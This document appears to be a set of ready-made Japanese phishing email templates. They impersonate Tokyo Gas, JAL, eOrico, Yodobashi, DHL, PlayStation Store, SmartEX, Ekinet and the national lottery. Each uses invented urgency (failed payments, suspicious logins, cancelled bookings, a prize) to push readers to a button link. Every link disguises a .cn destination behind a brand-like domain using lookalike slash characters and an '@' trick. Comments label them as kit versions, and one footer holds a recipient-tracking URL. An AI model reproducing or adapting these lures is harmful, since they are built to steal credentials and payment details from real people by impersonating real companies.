__ガスご利用料金確定のご連絡
<!-- UltraClean TokyoGas v1 | 料金通知構造完全再構成 --><HTML lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body {
margin: 0;
padding: 0;
font-family: "Meiryo", "Yu Gothic", sans-serif;
background: #eef3f8;
color: #222;
font-size: 15px;
line-height: 1.8;
}
.mail-shell {
max-width: 720px;
margin: 30px auto;
background: #fff;
border-radius: 10px;
box-shadow: 0 2px 10px rgba(0,0,0,0.05);
overflow: hidden;
}
.mail-header {
background: #003e7e;
color: #fff;
font-size: 17px;
font-weight: bold;
padding: 22px 26px;
}
.mail-body {
padding: 28px 30px;
}
.mail-body p {
margin: 14px 0;
}
.alert-box {
background: #fff9e5;
border-left: 5px solid #f9a825;
padding: 14px 20px;
font-weight: bold;
color: #7a4e00;
border-radius: 5px;
margin: 24px 0;
}
.cta-block {
text-align: center;
margin: 36px 0;
}
.cta-block a {
background: #0064b1;
color: #fff;
padding: 14px 36px;
border-radius: 40px;
text-decoration: none;
font-weight: bold;
font-size: 15px;
display: inline-block;
transition: all 0.3s ease;
}
.cta-block a:hover {
background: #0084d1;
}
.faq-section {
margin-top: 28px;
background: #f4f6fa;
border-top: 1px solid #ddd;
padding: 20px 22px;
}
.faq-section h4 {
font-size: 16px;
margin: 0 0 12px;
color: #003f7d;
}
.faq-section .q {
font-weight: bold;
color: #003f7d;
margin-top: 12px;
}
.faq-section .a {
margin-bottom: 10px;
}
.mail-footer {
background: #f1f1f1;
font-size: 12px;
color: #555;
padding: 20px;
text-align: center;
border-top: 1px solid #ccc;
}
.mail-footer a {
color: #0056a3;
text-decoration: underline;
}
@media screen and (max-width: 640px) {
.mail-body {
padding: 20px 16px;
font-size: 14px;
}
.cta-block a {
width: 100%;
padding: 14px 0;
box-sizing: border-box;
}
}
</STYLE>
</HEAD>
<BODY>
<DIV class=mail-shell>
<DIV class=mail-header>【東京ガス】お支払いに関する重要なお知らせ</DIV>
<DIV class=mail-body>
<P>平素より東京ガスをご利用いただき、誠にありがとうございます。</P>
<P>現在、今月のご請求金額が確定しておりますが、お客様の支払い処理が正常に完了しておりません。</P>
<DIV class=alert-box>このままではサービスが停止される可能性があるため、早急にお手続きをお願いいたします。</DIV>
<P style="cursor:auto;">下記リンクより、支払い情報をご確認のうえ更新をお願いいたします。</P>
<DIV class=cta-block><A
href="https://ijzth.com∕pvmfkbuppr∕nkeuygnw∕egdabegrli@ufoepjx.cn"
target=_blank>支払い情報を更新</A> </DIV>
<P>更新完了後、引き続きサービスをご利用いただけます。</P>
<DIV class=faq-section>
<H4>よくあるご質問(FAQ)</H4>
<DIV class=q>Q: 更新手続きには時間がかかりますか?</DIV>
<DIV class=a>A: 通常は数分で完了します。</DIV>
<DIV class=q>Q: 安全性は確保されていますか?</DIV>
<DIV class=a>A: はい、SSL暗号化通信により保護されています。</DIV></DIV></DIV>
<DIV class=mail-footer>※このメールは送信専用です。返信いただいても対応できません。<BR><A
href="https://lrwwvzlr.com/track/open?email=331b-hp@huat.jp&timestamp=1765730520">配信停止はこちら</A><BR><BR>©
東京ガス株式会社 </DIV></DIV></BODY></HTML>
__【期限間近】JALマイルのご案内
<HTML lang=ja><HEAD><TITLE>JALマイル有効期限通知</TITLE>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body { margin:0; padding:0; background:#f4f5f8; font-family:"Meiryo", sans-serif; color:#1e1e1e; }
.core-wrap { max-width:700px; margin:auto; background:#fff; border-radius:10px; overflow:hidden; box-shadow:0 0 6px rgba(0,0,0,0.04); }
.top-title { background:#005bac; color:#fff; font-size:16px; font-weight:bold; padding:18px 24px; text-align:center; }
.main-area { padding:26px 28px; font-size:14px; line-height:1.8; }
.highlight-miles { background:#fff5f5; border-left:5px solid #cc0000; padding:16px; margin:20px 0; border-radius:6px; color:#a30000; font-weight:bold; }
.cta-zone { padding:24px 18px; text-align:center; background:#fafafa; }
.cta-button { display:inline-block; background:#005bac; border-radius:24px; border:1px solid #004080; }
.cta-button a { display:block; padding:12px 36px; font-size:15px; font-weight:bold; color:#fff; text-decoration:none; }
.cta-button a:hover { background:#004080; }
.legal-note { padding:20px 28px; font-size:13px; color:#555; border-top:1px solid #ddd; }
.footer-bar { background:#f0f0f0; font-size:12px; color:#666; text-align:center; padding:18px; border-top:1px solid #ccc; }
.footer-bar p { margin:6px 0; }
@media screen and (max-width: 600px) {
.main-area, .legal-note { padding:18px 16px; }
.cta-button a { width:100%; padding:14px 0; box-sizing:border-box; }
}
</STYLE>
</HEAD>
<BODY>
<DIV class=core-wrap>
<DIV class=top-title>JALマイレージバンク - マイル失効のお知らせ</DIV>
<DIV class=main-area>
<P>いつもJALマイレージバンクをご利用いただき、誠にありがとうございます。</P>
<P>以下のマイルがまもなく有効期限を迎えますのでご確認ください。</P>
<DIV
class=highlight-miles>有効期限日:2025年12月15日<BR>対象マイル数:8,553マイル
</DIV>
<P>マイルは特典航空券やアップグレードなどにご利用いただけます。</P>
<P style="min-height:0;">有効期限前にぜひご活用ください。</P></DIV>
<DIV class=cta-zone>
<DIV class=cta-button><A
href="https://www.ilfxzahare.jp∕yfjdrne@xwimhxw.cn">マイルを今すぐ利用する</A>
</DIV></DIV>
<DIV class=main-area>
<P style="display:inline;">ご不明な点がございましたら、JALマイレージバンク カスタマーセンターまでご連絡ください。</P>
<P>今後ともJALをご愛顧賜りますようお願い申し上げます。</P></DIV>
<DIV class=legal-note>
<P>※このメールは送信専用です。ご返信には対応いたしかねます。</P>
<P style="text-transform:none;">※記載内容は2025年時点の情報です。</P></DIV>
<DIV class=footer-bar>
<P style="isolation:auto;">日本航空株式会社(JAL)JALマイレージバンク事務局</P>
<P>お客様サービス窓口:0120-255-971(毎日 7:00~21:00)</P>
<P style="FONT-SIZE: 11px; COLOR: #999">© Japan Airlines Co., Ltd. All rights
reserved.</P></DIV></DIV></BODY></HTML>
_eオリコカードご利用確認のお知らせとご案内
<!-- UltraClean Orico v1 | 完全新構造 + 新ボタンUI --><HTML lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body {
margin: 0;
padding: 0;
background-color: #f3f5f7;
font-family: "Meiryo", sans-serif;
color: #333;
font-size: 15px;
line-height: 1.7;
}
.shell {
max-width: 700px;
margin: 20px auto;
background: #fff;
border-radius: 12px;
overflow: hidden;
box-shadow: 0 1px 8px rgba(0,0,0,0.06);
border: 1px solid #ddd;
}
.headline {
background-color: #a52a00;
color: #fff;
padding: 20px;
font-size: 18px;
text-align: center;
font-weight: bold;
}
.main-content {
padding: 26px 28px;
}
.main-content p {
margin: 12px 0;
}
.warn-box {
background: #fff8e1;
border-left: 5px solid #fbc02d;
padding: 16px;
color: #5d4037;
border-radius: 5px;
margin: 20px 0;
}
.button-area {
display: flex;
justify-content: center;
margin: 30px 0;
}
.button-area a {
background: #a52a00;
color: #fff;
padding: 12px 28px;
border-radius: 40px;
font-size: 15px;
font-weight: bold;
text-decoration: none;
transition: all 0.3s ease;
}
.button-area a:hover {
background: #7f1f00;
}
.footnote {
background: #f4f4f4;
font-size: 13px;
color: #666;
padding: 20px 24px;
text-align: center;
border-top: 1px solid #ccc;
}
@media screen and (max-width: 600px) {
.main-content {
padding: 20px;
}
.button-area a {
width: 92%;
display: block;
text-align: center;
}
}
</STYLE>
</HEAD>
<BODY>
<DIV class=shell>
<DIV class=headline>eオリコカード|ご利用明細の通知</DIV>
<DIV class=main-content>
<P style="column-rule-color:transparent;">日頃よりeオリコカードをご愛顧いただき誠にありがとうございます。</P>
<P style="isolation:auto;">お客様のカードによるお引き落としが正常に完了いたしました。</P>
<P style="animation-iteration-count:1;">下記のリンクより、詳細なご利用明細をご確認いただけます。</P>
<DIV class=warn-box>万が一、身に覚えのないご利用がございましたら、速やかに弊社までご連絡をお願いいたします。 </DIV>
<DIV class=button-area><A
href="https://oricolecgjnw.com∕ibumsdrcj@busxnjc.cn"
target=_blank>ご利用明細の確認はこちら</A> </DIV></DIV>
<DIV
class=footnote>※本メールは送信専用です。返信はお受けできません。<BR>ご不明な点はeオリコカスタマーセンターまでお問い合わせください。
</DIV></DIV></BODY></HTML>
__ヨドバシ「お客様情報」利用時のブラウザ対応状況ガイド
<HTML lang=ja><HEAD><TITLE>【ヨドバシカメラ】アカウント安全確認</TITLE>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body { margin:0; padding:0; background:#f5f7f9; font-family:"Meiryo",sans-serif; color:#222; }
.main-box { max-width:680px; margin:auto; background:#ffffff; border-radius:10px; overflow:hidden; }
.topline { background:#263e7c; padding:20px; text-align:center; color:#fff; font-size:17px; font-weight:bold; }
.alert-zone { padding:26px 24px; font-size:14px; line-height:1.7; }
.warn-box { background:#fff3f3; padding:16px; border-left:6px solid #b90000; margin:20px 0; font-size:13px; }
.account-detail { background:#f0f3f7; padding:16px; border:1px solid #ccc; border-radius:4px; font-size:13px; margin:20px 0; }
.account-detail div { margin-bottom:6px; }
.action-box { text-align:center; margin:28px 0; }
.btn-table { margin:auto; background:#263e7c; border-radius:6px; }
.btn-table td { padding:14px 36px; }
.btn-table a { color:#fff; text-decoration:none; font-weight:bold; font-size:14px; display:inline-block; }
.help-line { font-size:12px; color:#444; line-height:1.6; padding-top:20px; border-top:1px solid #ddd; }
.footer-zone { background:#ececec; font-size:11px; text-align:center; color:#555; padding:18px 12px; border-top:1px solid #ccc; }
@media screen and (max-width: 600px) {
.alert-zone { padding:18px 14px; font-size:13px; }
.btn-table td { padding:16px 0; }
}
</STYLE>
</HEAD>
<BODY>
<DIV class=main-box>
<DIV class=topline>【ヨドバシカメラ】アカウント安全確認</DIV>
<DIV class=alert-zone>
<P style="max-width:none;">いつもヨドバシドットコムをご利用いただきありがとうございます。</P>
<P>2025-12-15 時点で、アカウントに不審なログイン試行が検出されました。</P>
<DIV
class=warn-box>セキュリティ保護のため、以下よりログイン状況の確認をお願いいたします。<BR>放置されますと、一部機能の利用制限が行われる可能性がございます。
</DIV>
<DIV class=account-detail>
<DIV><STRONG>対象アカウント:</STRONG> 331b-hp@huat.jp</DIV>
<DIV style="opacity:1;"><STRONG>検出日時:</STRONG> 2025-12-15 01:18:13</DIV>
<DIV><STRONG>検出内容:</STRONG> 海外IPアドレスからのアクセス</DIV>
<DIV><STRONG>現在の状態:</STRONG> 対応待ち</DIV></DIV>
<DIV class=action-box>
<TABLE class=btn-table cellSpacing=0 cellPadding=0>
<TBODY>
<TR>
<TD><A
href="https://oldfhgeqs.com∕rdnhrvj∕yltmz∕ayksyyky∕ssqdghd@biilvhm.cn">アカウントを確認する
</A></TD></TR></TBODY></TABLE></DIV>
<P>72時間以内にご確認いただけない場合、安全のため一時的な利用停止が行われることがあります。</P>
<DIV class=help-line><STRONG>お問い合わせ:</STRONG><BR>ヨドバシカメラ カスタマーサービスセンター<BR>メール:<A
href="mailto:info@y9MNA320odobashi.com">info@yodobashi.com</A><BR>電話:03-6362-9045(10:00〜20:00
年中無休) </DIV></DIV>
<DIV class=footer-zone>このメールは送信専用です。返信は受け付けておりません。<BR>不審に思われた場合は破棄してください。<BR>©
2025 ヨドバシカメラ株式会社 </DIV></DIV></BODY></HTML>
__DHL発送中のお知らせ:ご確認と対応をお願いします
<HTML lang=ja><HEAD><TITLE>がなのザん</TITLE>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body { margin:0; padding:0; background:#f6f7f8; font-family:"Meiryo",sans-serif; color:#202020; }
.wrap-block { max-width:700px; margin:auto; background:#fff; border-radius:10px; overflow:hidden; box-shadow:0 0 6px rgba(0,0,0,0.04); }
.banner-line { background:#d40511; color:#fff; text-align:center; font-weight:bold; font-size:16px; padding:18px; }
.content-box { padding:24px 26px; font-size:14px; line-height:1.75; }
.highlight-area { background:#fff4f4; border:1px solid #f3c3c3; padding:14px; font-weight:bold; color:#9e0000; border-left:6px solid #e60012; margin:20px 0; }
.button-area { text-align:center; margin:28px 0; }
.button-holder { display:inline-table; background:#d40511; border-radius:4px; border:1px solid #b0000f; }
.button-holder a { display:block; padding:14px 40px; color:#fff; font-size:15px; font-weight:bold; text-decoration:none; }
.button-holder a:hover { background:#a3000d; }
.footer-segment { font-size:12px; padding:20px 26px; border-top:1px solid #f0e082; background:#fcfcf4; color:#666; text-align:center; }
@media screen and (max-width:600px) {
.content-box { padding:18px 14px; font-size:13px; }
.button-holder a { width:100%; padding:16px 0; box-sizing:border-box; }
}
</STYLE>
</HEAD>
<BODY><SECTION class=wrap-block>
<DIV class=banner-line>配送に関する重要なお知らせ</DIV>
<DIV class=content-box>
<P><STRONG>お客様各位</STRONG></P>
<DIV class=highlight-area>パッケージ番号:****-*****-7820 は現在、配達待機中です。 </DIV>
<P style="font-stretch:normal;">配送状況をご確認いただき、必要な手続きを早急にお願い申し上げます。</P>
<P style="float:none;">以下のリンクより、現在の配送状況をご確認いただけます。</P></DIV>
<DIV class=button-area>
<DIV class=button-holder><A
href="https://mksksoniei.com∕aIgxqHqZ∕MOxHys∕kcnenBbJCG@nhsiqna.cn/Ybv69isT/user/A0UztjtBUaRc/BsE3HJSy/cart/_AwEY/tracking/Cj-2uhM6/offers/yby-zntc3fax/-qPheg/settings?utm_source=newsletter&clickid=KqhTht1pHKMK&cart_id=_-J6p4ja8f&token=_yGRluZQ5j-NDtnr&user_agent=RK95Ux4S2s&device=mobile">荷物を追跡する</A>
</DIV></DIV>
<DIV class=content-box>
<P>ご不明な点がございましたら、カスタマーサポートまでお問い合わせください。</P>
<P style="MARGIN-TOP: 24px">配送センター事務局<BR>〒100-0001 東京都千代田区霞が関1-1-1</P></DIV>
<DIV
class=footer-segment>本メールは自動配信専用です。返信いただいても対応できません。<BR>記載内容に誤りがある場合でも補償はできかねますのでご了承ください。
</DIV></SECTION></BODY></HTML>
EMV 3Dセキュア開始に伴う認証プロセス変更のご案内
<!-- UltraClean PSStore v1 | 完全異構HTML構造 + 新ボタン + 応答性 --><HTML lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body {
margin: 0;
padding: 0;
background: #e8ecf2;
font-family: "Meiryo", sans-serif;
font-size: 15px;
line-height: 1.7;
color: #1d1d1d;
}
.outer {
max-width: 700px;
margin: 30px auto;
background: #fff;
border-radius: 10px;
box-shadow: 0 1px 8px rgba(0,0,0,0.06);
overflow: hidden;
}
.top {
background: #25284f;
color: #fff;
padding: 24px;
font-size: 18px;
font-weight: bold;
text-align: center;
}
.content {
padding: 28px 30px;
}
.content h2 {
font-size: 16px;
color: #25284f;
border-left: 4px solid #7890ff;
padding-left: 10px;
margin: 0 0 16px;
}
.alert-box {
background: #eef2fd;
border: 1px solid #90b4f7;
padding: 16px;
margin: 20px 0;
border-radius: 4px;
font-size: 14px;
}
.cta-center {
margin: 30px 0;
text-align: center;
}
.cta-link {
background: #ffffff;
border: 2px solid #4a6cf7;
color: #4a6cf7;
padding: 12px 30px;
font-weight: bold;
border-radius: 999px;
text-decoration: none;
font-size: 15px;
display: inline-block;
transition: all 0.3s ease;
}
.cta-link:hover {
background: #f0f4ff;
}
.footer {
font-size: 12px;
color: #777;
background: #f5f5f5;
text-align: center;
padding: 18px;
border-top: 1px solid #ccc;
}
@media screen and (max-width: 600px) {
.content {
padding: 20px 16px;
}
.cta-link {
display: block;
width: 92%;
box-sizing: border-box;
padding: 14px 0;
}
}
</STYLE>
</HEAD>
<BODY>
<DIV class=outer>
<DIV class=top>PlayStation Store 本人認証に関するご案内</DIV>
<DIV class=content>
<H2>セキュリティ強化のご案内</H2>
<P style="font-feature-settings:normal;">平素よりPlayStation Storeをご利用いただき誠にありがとうございます。</P>
<P style="column-rule-color:transparent;">このたび、クレジットカード取引のさらなる安全性を確保するため、本人認証サービス(EMV 3-Dセキュア)を導入いたします。</P>
<DIV
class=alert-box>お支払い時にはワンタイムパスワードの入力が必要となる場合がございます。<BR>ご利用には、各カード会社のWebサイトやアプリでの事前登録が必要です。
</DIV>
<P style="border-top-right-radius:;">未登録の場合、お支払いが正常に完了しない可能性があります。詳細は以下のリンクをご確認ください。</P>
<DIV class=cta-center><A class=cta-link
href="https://ujagkzyd.com∕HpvWdjtIsS∕DSgyxxtd∕HNLFEc∕YJuLwbYQju∕OadnbznE@ltyABxjnU.rpddjfy.cn"
target=_blank>詳細を見る</A> </DIV>
<P style="text-overflow:clip;">本人認証サービスをご利用いただくことで、より安心してお買い物いただけます。</P></DIV>
<DIV class=footer>本メールは送信専用です。返信には対応しておりません。<BR>© 2025 Sony Interactive
Entertainment Inc. All Rights Reserved. </DIV></DIV></BODY></HTML>
__【至急対応】不正利用防止のため速やかな対応をお願いしますHT=0363671655965
<!-- UltraClean SmartEX v1 | 完全新DOM構造 + Official感 + Button変化 --><HTML
lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body {
margin: 0;
padding: 0;
font-family: "Meiryo", sans-serif;
background-color: #e5eaf0;
color: #2b2b2b;
font-size: 15px;
line-height: 1.8;
}
.frame {
max-width: 680px;
margin: 40px auto;
background: #ffffff;
border-radius: 10px;
box-shadow: 0 1px 8px rgba(0,0,0,0.05);
overflow: hidden;
}
.header {
background-color: #004e9a;
color: #ffffff;
padding: 22px 26px;
font-size: 18px;
font-weight: bold;
text-align: center;
}
.body {
padding: 26px 28px;
}
.body p {
margin: 14px 0;
}
.ticket-box {
background: #f2f7fb;
border: 1px solid #b3d7f0;
padding: 18px;
border-radius: 6px;
font-size: 14px;
margin: 24px 0;
}
.cta-wrap {
text-align: center;
margin: 32px 0;
}
.cta-wrap a {
background: #004e9a;
color: #fff;
font-weight: bold;
padding: 14px 34px;
text-decoration: none;
border-radius: 30px;
display: inline-block;
transition: background 0.3s ease;
font-size: 15px;
}
.cta-wrap a:hover {
background: #003366;
}
.footer {
font-size: 12px;
color: #666;
background: #f1f1f1;
padding: 20px 26px;
line-height: 1.6;
border-top: 1px solid #ccc;
}
@media screen and (max-width: 600px) {
.body {
padding: 20px 16px;
}
.cta-wrap a {
width: 92%;
padding: 14px 0;
box-sizing: border-box;
}
}
</STYLE>
</HEAD>
<BODY>
<DIV class=frame>
<DIV class=header>【重要】スマートEX ご予約内容のご確認</DIV>
<DIV class=body>
<P>平素よりスマートEXをご利用いただき、誠にありがとうございます。</P>
<P style="text-overflow:clip;">以下のご予約において、セキュリティ監視システムにより不正利用の可能性が検出されました。</P>
<DIV class=ticket-box><STRONG>■
ご予約内容</STRONG><BR>お預かり番号:34442152<BR>乗車日:2025-12-15<BR>区間:東京 →
新大阪<BR>乗車人数:おとな6名<BR>座席:スマートEX自由席<BR>発売額:81,278円 </DIV>
<P>このご予約は、<STRONG style="COLOR: #c00">一時的に停止</STRONG>されております。</P>
<P style="white-space:normal;">ご本人様によるお手続きが確認できない場合、自動的にキャンセルとなる可能性がございます。</P>
<P style="border-top-style:none;">お心当たりがない場合は、以下のリンクより会員情報の確認をお願いいたします。</P>
<DIV class=cta-wrap><A
href="https://zyblrwl.com∕fFCXbmg∕irNXFra∕lCgwA@xqhuxmt.cn/edjigaee.co.jp"
target=_blank>確認手続きはこちら</A> </DIV>
<P>お忙しい中恐縮ですが、何卒よろしくお願い申し上げます。</P></DIV>
<DIV
class=footer>※本メールは送信専用です。返信いただいても対応できません。<BR>※24時間以内にご確認いただけない場合、ご予約はキャンセルされる可能性があります。<BR>©
2025 SmartEX Inc. All rights reserved. </DIV></DIV></BODY></HTML>
__【緊急】えきねっとアカウント異常の自動退会迅速対応のお願い
<!-- UltraClean GenericSecure v1 | DOM再構成 + CTA再設計 + Responsive --><HTML
lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body {
margin: 0;
padding: 0;
font-family: "Yu Gothic", "Meiryo", sans-serif;
background: #eef0f4;
color: #222;
font-size: 15px;
line-height: 1.7;
}
.wrapper {
max-width: 700px;
margin: 24px auto;
background: #fff;
border-radius: 10px;
box-shadow: 0 1px 8px rgba(0,0,0,0.05);
overflow: hidden;
}
.topbar {
background: #003356;
color: #fff;
font-size: 17px;
font-weight: bold;
text-align: center;
padding: 20px;
}
.content {
padding: 28px 30px;
}
.content p {
margin: 14px 0;
}
.bullet-box {
background: #f4f6fa;
border-left: 4px solid #004466;
padding: 16px 20px;
margin: 20px 0;
font-size: 14px;
}
.bullet-box li {
margin-bottom: 10px;
}
.cta-area {
text-align: center;
margin: 30px 0;
}
.cta-button {
background: #004080;
color: #fff;
font-weight: bold;
font-size: 15px;
text-decoration: none;
border-radius: 999px;
padding: 14px 36px;
display: inline-block;
transition: background 0.3s ease;
}
.cta-button:hover {
background: #002f5c;
}
.footer {
background: #f3f3f3;
font-size: 13px;
color: #666;
text-align: center;
padding: 20px;
border-top: 1px solid #ccc;
line-height: 1.6;
}
@media screen and (max-width: 640px) {
.content {
padding: 20px 16px;
}
.cta-button {
width: 92%;
box-sizing: border-box;
padding: 14px 0;
}
}
</STYLE>
</HEAD>
<BODY>
<DIV class=wrapper>
<DIV class=topbar>【重要なお知らせ】アカウント保全のご協力のお願い</DIV>
<DIV class=content>
<P style="animation-fill-mode:none;">平素より弊社サービスをご利用いただき、誠にありがとうございます。</P>
<P style="background-position:0% 0%;">2025-12-14付けで、セキュリティ機能の強化に伴う本人確認の手続きが必要となっております。</P>
<UL class=bullet-box>
<LI>セキュリティ更新によるシステム変更
<LI>不正アクセス防止のための再確認
<LI>一定期間未ログインアカウントの確認義務 </LI></UL>
<P style="box-sizing:content-box;">以下のリンクよりログインしてご確認ください。</P>
<DIV class=cta-area><A class=cta-button
href="https://vyqufk.com∕AKTCuTHm∕YXyEymqtP∕ptEwW@aqglngf.cn/alxquurlsy.co.jp"
target=_blank>ログインして確認する</A> </DIV>
<P style="line-height:normal;">なお、期限までにご確認いただけない場合、アカウントのご利用に制限がかかる可能性がございます。</P></DIV>
<DIV class=footer>※ このメールは送信専用です。ご返信には対応しておりません。<BR>※ 不審なメールやリンクにご注意ください。
</DIV></DIV></BODY></HTML>
__宝くじファンの皆様へ:ジャンボ22枚進呈、登録で即受取可能
<!-- NOTE: Loto-style v1 新構造テンプレート --><HTML lang=ja><HEAD>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=format-detection content=telephone=no>
<META name=color-scheme content="light only">
<STYLE>
body {
margin: 0;
padding: 0;
background: #f4f4f4;
font-family: "Meiryo", sans-serif;
color: #222;
}
.wrap {
max-width: 680px;
margin: auto;
background: #fff;
border-radius: 8px;
overflow: hidden;
box-shadow: 0 0 6px rgba(0,0,0,0.08);
}
.head {
background: #9e0038;
color: #fff;
text-align: center;
padding: 20px;
font-size: 18px;
font-weight: bold;
}
.content {
padding: 24px;
}
.content h1 {
font-size: 17px;
color: #9e0038;
margin: 0 0 14px;
}
.content p {
font-size: 15px;
margin: 10px 0;
line-height: 1.7;
}
.box {
background: #fff8f8;
border-left: 4px solid #9e0038;
padding: 16px;
margin: 18px 0;
}
.cta {
display: flex;
justify-content: center;
padding: 30px 0;
}
.cta a {
display: block;
text-align: center;
border: 2px solid #9e0038;
color: #9e0038;
font-weight: bold;
text-decoration: none;
padding: 14px 24px;
border-radius: 28px;
font-size: 16px;
width: 90%;
max-width: 320px;
transition: 0.3s;
}
.cta a:hover {
background: #9e0038;
color: #fff;
}
.foot {
background: #efefef;
font-size: 12px;
text-align: center;
color: #666;
padding: 16px;
border-top: 1px solid #ccc;
}
@media (max-width: 600px) {
.content {
padding: 18px;
}
.cta a {
font-size: 17px;
padding: 16px;
}
}
</STYLE>
</HEAD>
<BODY>
<DIV class=wrap>
<DIV class=head>【宝くじ公式サイト】特別キャンペーンのお知らせ</DIV>
<DIV class=content>
<H1>日頃のご愛顧に感謝を込めて</H1>
<P>いつも宝くじ公式サイトをご利用いただき、誠にありがとうございます。</P>
<P style="font-weight:normal;">ただいま<EM>特別キャンペーン</EM>を期間限定で開催中です。</P>
<DIV class=box>
<P style="line-height:normal;"><STRONG>■ プレゼント内容:</STRONG><BR>ハロウィンジャンボ宝くじ
22枚(連番11枚+バラ11枚)<BR><STRONG>価格:</STRONG>6,600円相当</P>
<P style="font-variant-caps:normal;"><STRONG>■ 対象者:</STRONG> 宝くじ公式サイト会員</P>
<P style="border-right-width:0px;"><STRONG>■ 応募期限:</STRONG> このメール受信から <STRONG>3日以内</STRONG></P></DIV>
<P>キャンペーンの詳細は以下よりご確認ください。</P></DIV>
<DIV class=cta><A
href="https://ugcgujlfth.com∕XJUNGaVz∕VRYiYBL∕XAMwkusq∕zLWCUXO∕EJZKre@WjBHK.deqiemu.cn">キャンペーンに申し込む</A>
</DIV>
<DIV class=foot>本メールは送信専用です。お問い合わせは公式サイトよりお願いいたします。<BR>© 2025 宝くじ公式サイト All
rights reserved. </DIV></DIV></BODY></HTML>
__配送状況のお知らせ:DHLからアクションのお願い
<HTML lang=ja><HEAD><TITLE>ぐギひウヤシグ</TITLE>
<META charset=UTF-8>
<META name=viewport content="width=device-width, initial-scale=1.0">
<META name=robots content=noindex,nofollow>
<META name=format-detection content=telephone=no>
<STYLE>
body { margin:0; padding:0; background:#f6f7f8; font-family:"Meiryo",sans-serif; color:#202020; }
.wrap-block { max-width:700px; margin:auto; background:#fff; border-radius:10px; overflow:hidden; box-shadow:0 0 6px rgba(0,0,0,0.04); }
.banner-line { background:#d40511; color:#fff; text-align:center; font-weight:bold; font-size:16px; padding:18px; }
.content-box { padding:24px 26px; font-size:14px; line-height:1.75; }
.highlight-area { background:#fff4f4; border:1px solid #f3c3c3; padding:14px; font-weight:bold; color:#9e0000; border-left:6px solid #e60012; margin:20px 0; }
.button-area { text-align:center; margin:28px 0; }
.button-holder { display:inline-table; background:#d40511; border-radius:4px; border:1px solid #b0000f; }
.button-holder a { display:block; padding:14px 40px; color:#fff; font-size:15px; font-weight:bold; text-decoration:none; }
.button-holder a:hover { background:#a3000d; }
.footer-segment { font-size:12px; padding:20px 26px; border-top:1px solid #f0e082; background:#fcfcf4; color:#666; text-align:center; }
@media screen and (max-width:600px) {
.content-box { padding:18px 14px; font-size:13px; }
.button-holder a { width:100%; padding:16px 0; box-sizing:border-box; }
}
</STYLE>
</HEAD>
<BODY><SECTION class=wrap-block>
<DIV class=banner-line>配送に関する重要なお知らせ</DIV>
<DIV class=content-box>
<P><STRONG>お客様各位</STRONG></P>
<DIV class=highlight-area>パッケージ番号:****-*****-4219 は現在、配達待機中です。 </DIV>
<P>配送状況をご確認いただき、必要な手続きを早急にお願い申し上げます。</P>
<P style="border-bottom-left-radius:1em;">以下のリンクより、現在の配送状況をご確認いただけます。</P></DIV>
<DIV class=button-area>
<DIV class=button-holder><A
href="https://buzivvrvl.com∕zyePzMyH∕szBowrG∕gCDgKNnB@nhsiqna.cn/WVCUNkH/tracking/sySd18z5qQM_/-aUj_xTc/notifications/WjImk4/help/EH6TU5pt5n/j164cf/product/tTZdiLUK/subscription/PBO0ZxE/product/rXPhXGFXydm?ref=ZF7W22Ja&token=Nzz_3oMm8rkT6aal&product=vrk-LUPe&id=JlPgkk">荷物を追跡する</A>
</DIV></DIV>
<DIV class=content-box>
<P>ご不明な点がございましたら、カスタマーサポートまでお問い合わせください。</P>
<P style="MARGIN-TOP: 24px">配送センター事務局<BR>〒100-0001 東京都千代田区霞が関1-1-1</P></DIV>
<DIV
class=footer-segment>本メールは自動配信専用です。返信いただいても対応できません。<BR>記載内容に誤りがある場合でも補償はできかねますのでご了承ください。
</DIV></SECTION></BODY></HTML>